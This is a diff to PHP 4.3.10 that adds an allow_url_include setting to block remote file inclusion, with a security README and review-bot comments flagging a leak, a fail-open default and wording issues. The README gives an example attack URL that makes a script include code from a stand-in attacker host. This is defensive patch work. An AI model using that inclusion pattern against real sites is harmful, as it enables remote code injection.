diff -Naur php-4.3.10.orig/README.Security php-4.3.10/README.Security
--- php-4.3.10.orig/README.Security 1970-01-01 01:00:00.000000000 +0100
+++ php-4.3.10/README.Security 2005-03-01 22:35:15.000000000 +0100
@@ -0,0 +1,37 @@
+[2005-03-01] Tom Z. Meinlschmidt
+
+* added allow_url_include (On|Off) variable to php.ini and patch Zend due to
+ security reason. Streams like http/ftp allow attacker to perform cross-site
+ scripting attack, set allow_url_fopen to Off is not the right solution.
+ Safe mode DOESN'T change anything, so don't use it to secure THIS hole.
+
+ Example script:
+
+
+ and attacker uses:
+
+ http://some.host/script.php?page=http://attacker.site/hack.html ...
+
+ Solution:
+
+ Apply patch, set allow_url_include to Off, restart apache. And re-code your
+ scripts like this humbly example:
+
+ 'info/info_page.php',
+ 'contact' => 'contact/contact.php'
+ );
+
+ $include_page = ($pages[$page]!="") ? $pages[$page] : "default.php";
+
+ include_once ( $include_page );
+
+ ?>
diff -Naur php-4.3.10.orig/Zend/zend_execute.c php-4.3.10/Zend/zend_execute.c
--- php-4.3.10.orig/Zend/zend_execute.c 2004-11-03 12:23:59.000000000 +0100
+++ php-4.3.10/Zend/zend_execute.c 2005-03-01 22:44:47.000000000 +0100
@@ -33,6 +33,8 @@
 #include "zend_execute_locks.h"
 #include "zend_ini.h"
+#include "main/php.h"
+
 #define get_zval_ptr(node, Ts, should_free, type) _get_zval_ptr(node, Ts, should_free TSRMLS_CC)
 #define get_zval_ptr_ptr(node, Ts, type) _get_zval_ptr_ptr(node, Ts TSRMLS_CC)
@@ -1035,6 +1037,8 @@
 {
 zend_execute_data execute_data;
+ php_stream_wrapper *wrapper = NULL;
+
 /* Initialize execute_data */
 EX(fbc) = NULL;
 EX(ce) = NULL;
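Review bot: Including `main/php.h` from Zend/zend_execute.c (the @@ -33 hunk) makes the engine depend on the main/ layer that normally sits above it, so any build that compiles Zend without main/ on its include path stops compiling; the engine-side guard would be cleaner behind a flag or callback owned by the engine and installed from main/ at startup, keeping php.h out of Zend/. The `php_stream_wrapper *wrapper` declared at the top of `execute()` in the @@ -1035 hunk is only used by the include opcode, so it could be scoped to that case block instead of living across the whole dispatch loop. The body of `execute()` continues far beyond the hunk.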
@@ -2140,7 +2144,14 @@
 convert_to_string(&tmp_inc_filename);
 inc_filename = &tmp_inc_filename;
 }
-
+
+ wrapper = php_stream_locate_url_wrapper(inc_filename->value.str.val, NULL, STREAM_LOCATE_WRAPPERS_ONLY TSRMLS_CC);
+ if (wrapper != NULL && wrapper->is_url && !PG(allow_url_include)) {
+ zend_error(E_WARNING, "URL include is disabled in the server configuration");
+ NEXT_OPCODE();
+ break;
+ }
+
 return_value_used = RETURN_VALUE_USED(EX(opline));
 switch (EX(opline)->op2.u.constant.value.lval) {
diff -Naur php-4.3.10.orig/main/main.c php-4.3.10/main/main.c
--- php-4.3.10.orig/main/main.c 2004-10-01 16:27:13.000000000 +0200
+++ php-4.3.10/main/main.c 2005-03-01 17:10:13.000000000 +0100
@@ -361,6 +361,7 @@
 PHP_INI_ENTRY("disable_classes", "", PHP_INI_SYSTEM, NULL)
 STD_PHP_INI_BOOLEAN("allow_url_fopen", "1", PHP_INI_SYSTEM, OnUpdateBool, allow_url_fopen, php_core_globals, core_globals)
+ STD_PHP_INI_BOOLEAN("allow_url_include", "1", PHP_INI_SYSTEM, OnUpdateBool, allow_url_include, php_core_globals, core_globals)
 STD_PHP_INI_BOOLEAN("always_populate_raw_post_data", "0", PHP_INI_SYSTEM|PHP_INI_PERDIR, OnUpdateBool, always_populate_raw_post_data, php_core_globals, core_globals)
 PHP_INI_END()
diff -Naur php-4.3.10.orig/main/php_globals.h php-4.3.10/main/php_globals.h
--- php-4.3.10.orig/main/php_globals.h 2003-05-18 12:22:16.000000000 +0200
+++ php-4.3.10/main/php_globals.h 2005-03-01 17:08:45.000000000 +0100
@@ -137,6 +137,7 @@
 zend_bool during_request_startup;
 zend_bool allow_url_fopen;
+ zend_bool allow_url_include;
 zend_bool always_populate_raw_post_data;
diff -Naur php-4.3.10.orig/php.ini-dist php-4.3.10/php.ini-dist
--- php-4.3.10.orig/php.ini-dist 2004-08-18 07:05:23.000000000 +0200
+++ php-4.3.10/php.ini-dist 2005-03-01 22:20:47.000000000 +0100
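Review bot: The refusal path leaves the opcode through `NEXT_OPCODE()` without the cleanup the normal path does afterwards: when the operand was not already a string, `inc_filename` points at the local `tmp_inc_filename` copy made just above the hunk, and that copy (plus the operand free the case performs later, outside the hunk) is never released, so every refused include leaks the filename string until request shutdown; add `if (inc_filename == &tmp_inc_filename) { zval_dtor(&tmp_inc_filename); }` and the op1 free before `NEXT_OPCODE();`. The `break;` following `NEXT_OPCODE()` is unreachable if that macro continues the dispatch loop as it does elsewhere in this file, and should be dropped. The guard also sits before the `switch` on op2, so the wrapper lookup runs for the eval variant of this opcode too, whose operand is source text rather than a path; placing it inside the include/require cases avoids that. Finally the decision rests solely on `wrapper->is_url`, so a wrapper registered as non-URL but reading request-supplied data (`php://input`, if its is_url flag is clear in this tree) is not covered — confirm against the wrapper table and match such wrappers explicitly if so. The enclosing case and `execute()` extend beyond the hunk.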
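Review bot: The compiled-in default for `allow_url_include` is "1", so an installation that applies this patch without also adding the directive to its php.ini keeps URL includes enabled — the opposite of what README.Security and both shipped php.ini files intend, and a silent fail-open for every existing deployment; the entry should default closed, `STD_PHP_INI_BOOLEAN("allow_url_include", "0", PHP_INI_SYSTEM, OnUpdateBool, allow_url_include, php_core_globals, core_globals)`. PHP_INI_SYSTEM is the right scope, since it keeps the setting out of reach of ini_set() and per-directory overrides.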
@@ -493,6 +493,11 @@
 ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
 allow_url_fopen = On
+; Whether to allow the treatment of URLs (like http:// or ftp://) in include
+; include_once, require and require_once statements
+; due to security reasons, is strongly recommended to leave it Off as default
+allow_url_include = Off
+
 ; Define the anonymous ftp password (your email address)
 ;from="john@doe.com"
diff -Naur php-4.3.10.orig/php.ini-recommended php-4.3.10/php.ini-recommended
--- php-4.3.10.orig/php.ini-recommended 2004-08-18 07:05:23.000000000 +0200
+++ php-4.3.10/php.ini-recommended 2005-03-01 22:20:45.000000000 +0100
@@ -508,6 +508,11 @@
 ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
 allow_url_fopen = On
+; Whether to allow the treatment of URLs (like http:// or ftp://) in include
+; include_once, require and require_once statements
+; due to security reasons, is strongly recommended to leave it Off as default
+allow_url_include = Off
+
 ; Define the anonymous ftp password (your email address)
 ;from="john@doe.com"
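Review bot: The new comment block reads awkwardly ("in include include_once", "due to security reasons, is strongly recommended to leave it Off as default") and should be tightened before it ships in the template every installation copies; I would write `; Whether to allow the treatment of URLs (like http:// or ftp://) in include,` / `; include_once, require and require_once statements.` / `; For security reasons it is strongly recommended to leave this Off.`. The php.ini-recommended hunk below carries the identical text and should get the same wording.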